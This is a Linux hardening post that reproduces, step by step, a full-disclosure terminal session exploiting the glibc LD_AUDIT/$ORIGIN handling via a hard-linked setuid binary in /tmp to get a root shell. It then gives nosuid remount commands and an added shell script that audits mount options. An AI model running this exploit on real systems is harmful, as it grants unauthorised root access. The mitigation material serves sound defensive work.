Linux: privilege escalation via /tmp

Log in as an ordinary user
[hello@localhost tmp]$ ls -ld /tmp/ because the tmp directory is world-writable!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[hello@localhost tmp]$ cd /tmp/
[hello@localhost tmp]$ mkdir exploit
[hello@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[hello@localhost tmp]$ exec 3< /tmp/exploit/target file descriptor: open /tmp/exploit/target as file descriptor 3
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$ rm -fr /tmp/exploit/
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$ cat > payload.c a senior system administrator must understand C thoroughly!!
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[hello@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[hello@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[hello@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 set the environment variable
[root@localhost tmp]# whoami
root


--------------
http://marc.info/?l=full-disclosure&m=128739684614072&w=2
In general, do not leave directories with 777 permissions. If you must, apply the following to the 777 directory, for example /tmp, and the privilege escalation shown above is blocked:
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp nosuid: setuid bits are not honoured on this mount
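The two mount commands above harden an existing system, but an administrator also wants a repeatable way to verify that a world-writable directory is actually mounted with nosuid. The following POSIX shell script is an added example, not part of the original post: it parses mount-table lines in the format of /proc/self/mounts, reports whether a given mount point carries a given option, and flags a directory that is either not a separate mount at all (so it inherits the parent filesystem's options) or lacks nosuid. The sample mount table is constructed for the example; the live check assumes the Linux path /proc/self/mounts.

```shell
#!/bin/sh
# Added example (not from the original post): audit whether a world-writable
# directory such as /tmp is mounted with nosuid, as the remount above arranges.

# Constructed sample of /proc/self/mounts lines (not output from a real host).
# Fields: device, mount point, fstype, options, dump, pass.
SAMPLE_MOUNTS='proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda1 /tmp ext4 rw,nosuid,relatime 0 0
tmpfs /var/tmp tmpfs rw,relatime 0 0'

# has_mount_opt MOUNTS_TEXT MOUNTPOINT OPTION
# Prints "yes" and returns 0 when MOUNTPOINT appears in MOUNTS_TEXT with OPTION
# in its option list; prints "no" and returns 1 otherwise. Options are compared
# as whole comma-separated tokens so "nosuid" does not match e.g. "nosuidfoo".
has_mount_opt() {
    _text=$1; _mp=$2; _opt=$3
    printf '%s\n' "$_text" | awk -v mp="$_mp" -v opt="$_opt" '
        $2 == mp {
            n = split($4, o, ",")
            for (i = 1; i <= n; i++) if (o[i] == opt) found = 1
        }
        END { if (found) { print "yes"; exit 0 } else { print "no"; exit 1 } }'
}

# is_mount_point MOUNTS_TEXT MOUNTPOINT
# Returns 0 when MOUNTPOINT has its own entry in the mount table.
is_mount_point() {
    printf '%s\n' "$1" | awk -v mp="$2" '$2 == mp { f = 1 } END { exit !f }'
}

# check_tmp_hardening MOUNTS_TEXT MOUNTPOINT
# Returns 0 when MOUNTPOINT is a separate mount carrying nosuid; otherwise
# prints why it fails and returns 1. A directory that is not its own mount
# cannot have nosuid applied to it, which is exactly why the bind mount
# (mount -o bind /tmp /tmp) precedes the remount in the procedure above.
check_tmp_hardening() {
    _text=$1; _mp=$2
    if ! is_mount_point "$_text" "$_mp"; then
        echo "$_mp: not a separate mount point; it inherits the parent filesystem's options (bind-mount it first)"
        return 1
    fi
    if has_mount_opt "$_text" "$_mp" nosuid >/dev/null; then
        echo "$_mp: nosuid set"
        return 0
    fi
    echo "$_mp: world-writable directory mounted without nosuid; remount with nosuid"
    return 1
}

# Run against the real mount table when available (Linux only).
if [ -r /proc/self/mounts ]; then
    check_tmp_hardening "$(cat /proc/self/mounts)" /tmp || :
    check_tmp_hardening "$(cat /proc/self/mounts)" /var/tmp || :
fi
```

Against the constructed sample, /tmp passes (it is its own mount with nosuid), /var/tmp fails because it is mounted without nosuid, and a directory with no entry of its own, such as /home, fails because nothing can be remounted until it is bind-mounted first. On a real host the script reads /proc/self/mounts and applies the same two checks to /tmp and /var/tmp.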

